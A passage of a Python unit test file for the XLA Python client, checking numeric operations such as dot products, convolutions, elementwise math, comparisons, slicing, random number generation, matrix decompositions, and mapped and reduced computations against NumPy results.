lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixVectorF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = (([2], [1]), ([0], [0]))
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.xla_data_pb2.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))
def testConvF32Same(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(c.Constant(lhs), c.Constant(rhs),
[1, 1], xla_client.PaddingType.SAME)
result = np.array([[[[640., 700., 760., 300.],
[880., 940., 1000., 380.],
[1120., 1180., 1240., 460.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvF32Valid(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(c.Constant(lhs), c.Constant(rhs),
[2, 1], xla_client.PaddingType.VALID)
result = np.array([[[[640., 700., 760.],
[1120., 1180., 1240.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvWithGeneralPaddingF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
c.ConvWithGeneralPadding(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
c.ConvGeneralDilated(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NHWC", "OIHW", "CWNH")
c.ConvGeneralDilated(c.Constant(np.transpose(lhs, (0, 2, 3, 1))),
c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=np.transpose(result, (1, 3, 0, 2)))
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
feature_group_count = 2
c.ConvGeneralDilated(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers, feature_group_count)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]],
[[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
c.Not(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=~arr)
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Exp(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.exp(arr))
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Expm1(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.expm1(arr))
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Round(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.round(arr))
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log(arr))
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log1p(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log1p(arr))
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Neg(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=-arr)
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Floor(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.floor(arr))
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Ceil(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.ceil(arr))
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
c.Abs(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.abs(arr))
def testTanh(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Tanh(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.tanh(arr))
def testTrans(self):
def _TransposeAndTest(array):
c = self._NewComputation()
c.Trans(c.Constant(array))
self._ExecuteAndCompareClose(c, expected=array.T)
# Test square and non-square matrices in both default (C) and F orders.
for array_fun in [NumpyArrayF32, NumpyArrayF64]:
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]]))
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]], order="F"))
_TransposeAndTest(array_fun([[1, 2], [4, 5]]))
_TransposeAndTest(array_fun([[1, 2], [4, 5]], order="F"))
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
c.Transpose(c.Constant(array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=expected)
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
c.Eq(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testNe(self):
c = self._NewComputation()
c.Ne(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True])
c.Ne(
c.Constant(NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
c.Constant(NumpyArrayF32([2.0, -0.0, 1.0, float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose, c, (), expected=[True, False, True, True])
def testGt(self):
c = self._NewComputation()
c.Gt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False, False])
def testGe(self):
c = self._NewComputation()
c.Ge(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False, False])
def testLt(self):
c = self._NewComputation()
c.Lt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, False, False, True, True])
def testLe(self):
c = self._NewComputation()
c.Le(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True, True])
def testMax(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 2.0, 3.0, 7.0, 12.0])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(c, expected=[[3, 3, 3], [4, 5, 6], [7, 8, 9]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(c, expected=[[3, 4, 5], [4, 5, 6], [7, 8, 9]])
def testMin(self):
c = self._NewComputation()
c.Min(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 0.0, 2.0, 4.0, 9.0])
def testPad(self):
c = self._NewComputation()
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)),
[(1, 2, 1), (0, 1, 0)])
self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[0.0, 0.0, 0.0],
[3.0, 4.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.xla_data_pb2.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = padding_config.dimensions.add()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)),
padding_config)
self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[0.0, 0.0, 0.0],
[3.0, 4.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]])
def testReshape(self):
c = self._NewComputation()
c.Reshape(
c.Constant(NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 5, 6]])
def testCollapse(self):
c = self._NewComputation()
c.Collapse(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3, 4], [5, 6, 7, 8]])
def testRev(self):
c = self._NewComputation()
c.Rev(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[6, 5], [8, 7]], [[2, 1], [4, 3]]])
def testClampF32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayF32(-1)),
c.Constant(NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
# TODO(b/72689392): re-enable when bug S32 resolved
def DISABLED_testClampS32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayS32(-1)),
c.Constant(NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, 0, 1, 2, 2])
def testSelect(self):
c = self._NewComputation()
c.Select(
c.Constant(NumpyArrayBool([True, False, False, True, False])),
c.Constant(NumpyArrayS32([1, 2, 3, 4, 5])),
c.Constant(NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[1, -2, -3, 4, -5])
def testSlice(self):
c = self._NewComputation()
c.Slice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), [1, 0],
[3, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testSliceInDim(self):
c = self._NewComputation()
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[2], [5], [8]])
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [7, 8, 9]])
def testDynamicSlice(self):
c = self._NewComputation()
c.DynamicSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([1, 0])), [2, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
c.DynamicUpdateSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([[1, 2], [3, 4]])),
c.Constant(NumpyArrayS32([1, 1])))
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 1, 2], [7, 3, 4]])
def testTuple(self):
c = self._NewComputation()
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True])))
result = c.Build().Compile().ExecuteWithPythonValues()
self.assertIsInstance(result, tuple)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
c.GetTupleElement(
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True]))), 1)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0])
def testBroadcast(self):
c = self._NewComputation()
c.Broadcast(c.Constant(NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]])
def testBroadcastInDim(self):
c = self._NewComputation()
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1], [2, 2]])
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[1, 2], [1, 2]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
c.RngNormal(c.Constant(NumpyArrayF32(0.)), c.Constant(NumpyArrayF32(1.)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape and uniqueness
self.assertEqual(result.shape, shape)
self.assertEqual(len(np.unique(result)), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(c.Constant(NumpyArrayF32(lo)), c.Constant(NumpyArrayF32(hi)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape, uniqueness, and range
self.assertEqual(result.shape, shape)
self.assertEqual(len(np.unique(result)), np.prod(shape))
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(c.Constant(NumpyArrayS32(lo)), c.Constant(NumpyArrayS32(hi)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape, integrality, and range
self.assertEqual(result.shape, shape)
self.assertEqual(result.dtype, np.int32)
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
c.Cholesky(c.Constant(np.dot(l, l.T)))
self._ExecuteAndCompareClose(c, expected=l, rtol=1e-4)
def testQR(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
c.QR(c.Constant(a), full_matrices=True)
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
c.TriangularSolve(c.Constant(a_vals), c.Constant(b_vals), left_side=False,
lower=True, transpose_a=True)
self._ExecuteAndCompareClose(c, expected=np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
], dtype=np.float32), rtol=1e-4)
def testIsConstant(self):
c = self._NewComputation()
a = c.ConstantS32Scalar(3)
b = c.ConstantS32Scalar(1)
x = c.ParameterFromNumpy(NumpyArrayS32(0))
const_expr = c.Sub(b, a)
non_const_expr = c.Mul(const_expr, x)
self.assertTrue(c.IsConstant(const_expr))
self.assertFalse(c.IsConstant(non_const_expr))
# self.assertTrue(c.IsConstant(c.Sub(c.Add(x, a), x))) # TODO(b/77245564)
class EmbeddedComputationsTest(LocalComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantS32Computation(self):
"""Computation (f32) -> s32 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s32_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantS32Scalar(1)
return c.Build()
def _CreateConstantS64Computation(self):
"""Computation (f64) -> s64 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s64_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantS64Scalar(1)
return c.Build()
def _CreateConstantF32Computation(self):
"""Computation (f32) -> f32 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f32_one")
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantF32Scalar(1.0)
return c.Build()
def _CreateConstantF64Computation(self):
"""Computation (f64) -> f64 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f64_one")
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantF64Scalar(1.0)
return c.Build()
def _CreateMulF32By2Computation(self):
"""Computation (f32) -> f32 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(2.0))
return c.Build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateMulF64By2Computation(self):
"""Computation (f64) -> f64 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f64_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(2.0))
return c.Build()
def _CreateBinaryAddF32Computation(self):
"""Computation (f32, f32) -> f32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryAddF64Computation(self):
"""Computation (f64, f64) -> f64 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateBinaryDivF32Computation(self):
"""Computation (f32, f32) -> f32 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryDivF64Computation(self):
"""Computation (f64, f64) -> f64 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateTestF32Lt10Computation(self):
"""Computation (f32) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f32_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(10.))
return c.Build()
def _CreateTestF64Lt10Computation(self):
"""Computation (f64) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f64_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(10.))
return c.Build()
def _CreateBinaryGeF32Computation(self):
"""Computation (f32, f32) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryGeF64Computation(self):
"""Computation (f64, f64) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _MakeSample3DArrayF32(self):
return NumpyArrayF32([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def _MakeSample3DArrayF64(self):
return NumpyArrayF64([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def testCallF32(self):
c = self._NewComputation()
c.Call(
self._CreateMulF32By2Computation(),
operands=(c.ConstantF32Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testCallF64(self):
c = self._NewComputation()
c.Call(
self._CreateMulF64By2Computation(),
operands=(c.ConstantF64Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testMapEachElementToS32Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS32Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapEachElementToS64Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS64Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapMulBy2F32(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testMapMulBy2F64(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testSimpleMapChainF32(self):
# Chains a map of constant-f32 with a map of mul-by-2
c = self._NewComputation()
const_f32 = c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF32Computation(), [0])
c.Map([const_f32], self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testSimpleMapChainF64(self):
# Chains a map of constant-f64 with a map of mul-by-2
c = self._NewComputation()
const_f64 = c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF64Computation(), [0])
c.Map([const_f64], self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testDivVectorsWithMapF32(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF32([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF32Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testDivVectorsWithMapF64(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF64([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF64Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testSelectAndScatterF32(self):
c = self._NewComputation()
c.SelectAndScatter(c.Constant(NumpyArrayF32([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF32([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF32(1)),
scatter=self._CreateBinaryAddF32Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testSelectAndScatterF64(self):
c = self._NewComputation()
c.SelectAndScatter(c.Constant(NumpyArrayF64([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF64([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF64(1)),
scatter=self._CreateBinaryAddF64Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testReduce1DtoScalarF32(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce1DtoScalarF64(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
